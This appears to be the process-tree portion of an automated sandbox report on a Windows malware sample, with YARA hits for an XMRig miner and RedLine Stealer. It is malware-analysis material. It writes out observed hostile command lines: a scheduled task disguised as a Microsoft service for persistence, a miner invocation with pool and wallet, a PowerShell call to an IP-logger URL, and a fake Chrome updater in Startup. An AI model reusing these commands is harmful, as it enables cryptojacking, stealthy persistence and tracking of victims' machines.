                                                                                                                                                                                            Commandline:'C:\Users\user\Desktop\8TD8GfTtaW.exe'
                                                                                                                                                                                            Imagebase:0x1390000
                                                                                                                                                                                            File size:2649312 bytes
                                                                                                                                                                                            MD5 hash:A5D3FDF55ABB54EC0B632DEE9D3459D4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: nulhfhsi.exe PID: 6988 Parent PID: 6708

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:11:14
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Users\user\AppData\Local\nulhfhsi.exe'
                                                                                                                                                                                            Imagebase:0x3b0000
                                                                                                                                                                                            File size:4964504 bytes
                                                                                                                                                                                            MD5 hash:70DCA411445D3B4394D9C467BF3FF994
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000003.395598364.0000000006AAB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000003.395598364.0000000006AAB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.476502860.0000000004B5A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000002.476458617.0000000004A5A000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.476458617.0000000004A5A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000003.395324200.0000000006A7E000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000003.395324200.0000000006A7E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 24%, Metadefender, Browse
                                                                                                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: lxoqz3o0.exe PID: 5748 Parent PID: 6708

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:11:19
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\lxoqz3o0.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Users\user\AppData\Local\lxoqz3o0.exe'
                                                                                                                                                                                            Imagebase:0xf0000
                                                                                                                                                                                            File size:2611424 bytes
                                                                                                                                                                                            MD5 hash:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.498040430.00000000000F2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 61%, ReversingLabs
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: schtasks.exe PID: 6212 Parent PID: 5748

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:11:28
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                                                                                                                                                                                            Imagebase:0x1000000
                                                                                                                                                                                            File size:185856 bytes
                                                                                                                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 6300 Parent PID: 6212

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:11:29
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: RantimeBroker.exe PID: 6352 Parent PID: 904

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:11:30
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                                                                                                            Imagebase:0x1130000
                                                                                                                                                                                            File size:2611424 bytes
                                                                                                                                                                                            MD5 hash:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.497823578.0000000000FA9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000003.295958006.0000000001840000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: cpu.exe PID: 6272 Parent PID: 5748

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:11:35
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                                                                                                                                                                                            Imagebase:0x7ff64cbf0000
                                                                                                                                                                                            File size:6889640 bytes
                                                                                                                                                                                            MD5 hash:E95F766A3748042EFBF0F05D823F82B7
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.310965675.000002ABFF28A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.502678236.000002ABFF250000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.502678236.000002ABFF250000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.502700687.000002ABFF257000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.502700687.000002ABFF257000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 5544 Parent PID: 6272

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:11:37
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.528913817.00000247A05AB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: schtasks.exe PID: 328 Parent PID: 6352

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:11:40
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                                                                                                                                                                                            Imagebase:0xad0000
                                                                                                                                                                                            File size:185856 bytes
                                                                                                                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 6060 Parent PID: 328

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:11:51
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: cpu.exe PID: 7072 Parent PID: 6352

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:14:08
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
                                                                                                                                                                                            Wow64 process (32bit):
                                                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                                                                                                                                                                                            Imagebase:
                                                                                                                                                                                            File size:6889640 bytes
                                                                                                                                                                                            MD5 hash:E95F766A3748042EFBF0F05D823F82B7
                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: evs.exe PID: 6396 Parent PID: 6988

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:30
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\evs.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Users\user\AppData\Local\Temp\evs.exe'
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:309398 bytes
                                                                                                                                                                                            MD5 hash:8C373745D8604DA05314DE16F0BF7CED
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 82%, ReversingLabs
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: cmd.exe PID: 5964 Parent PID: 6396

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:34
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                                                                                                                                                                                            Imagebase:0x1370000
                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: revs.exe PID: 4784 Parent PID: 6988

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:36
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\revs.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Users\user\AppData\Local\Temp\revs.exe'
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:4602592 bytes
                                                                                                                                                                                            MD5 hash:029CE2E532FE5C70D3342F978F5463D0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 24%, Metadefender, Browse
                                                                                                                                                                                            • Detection: 90%, ReversingLabs
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 5608 Parent PID: 5964

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:35
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: hello_C# (2).exe PID: 6252 Parent PID: 5964

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:35
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\hello_C# (2).exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:'hello_C# (2).exe'
                                                                                                                                                                                            Imagebase:0xcb0000
                                                                                                                                                                                            File size:3584 bytes
                                                                                                                                                                                            MD5 hash:D6B9F530E7E8DDEBEA8069A0D94AD38E
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 3%, Metadefender, Browse
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: hello_C#.exe PID: 6800 Parent PID: 5964

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:35
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\hello_C#.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:'hello_C#.exe'
                                                                                                                                                                                            Imagebase:0x7b0000
                                                                                                                                                                                            File size:3584 bytes
                                                                                                                                                                                            MD5 hash:D6B9F530E7E8DDEBEA8069A0D94AD38E
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 3%, Metadefender, Browse
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 1488 Parent PID: 6252

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:36
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 4648 Parent PID: 6800

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:36
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: jo.exe PID: 4948 Parent PID: 5964

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:36
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\jo.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'jo.exe'
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:309248 bytes
                                                                                                                                                                                            MD5 hash:28E49F705BFD5A6785391BAC1C0E3359
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 79%, ReversingLabs

                                                                                                                                                                                            Analysis Process: powershell.exe PID: 6420 Parent PID: 5964

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:37
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                                                                                                                                                                                            Imagebase:0xe40000
                                                                                                                                                                                            File size:430592 bytes
                                                                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                            Analysis Process: iexplore.exe PID: 6064 Parent PID: 792

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:58
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                                            Imagebase:0x7ff690170000
                                                                                                                                                                                            File size:823560 bytes
                                                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: iexplore.exe PID: 6360 Parent PID: 6064

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:13:00
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6064 CREDAT:17410 /prefetch:2
                                                                                                                                                                                            Imagebase:0xfc0000
                                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: Chrome updater.exe PID: 5056 Parent PID: 3472

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:13:02
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe'
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:4602592 bytes
                                                                                                                                                                                            MD5 hash:029CE2E532FE5C70D3342F978F5463D0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                            Reset < >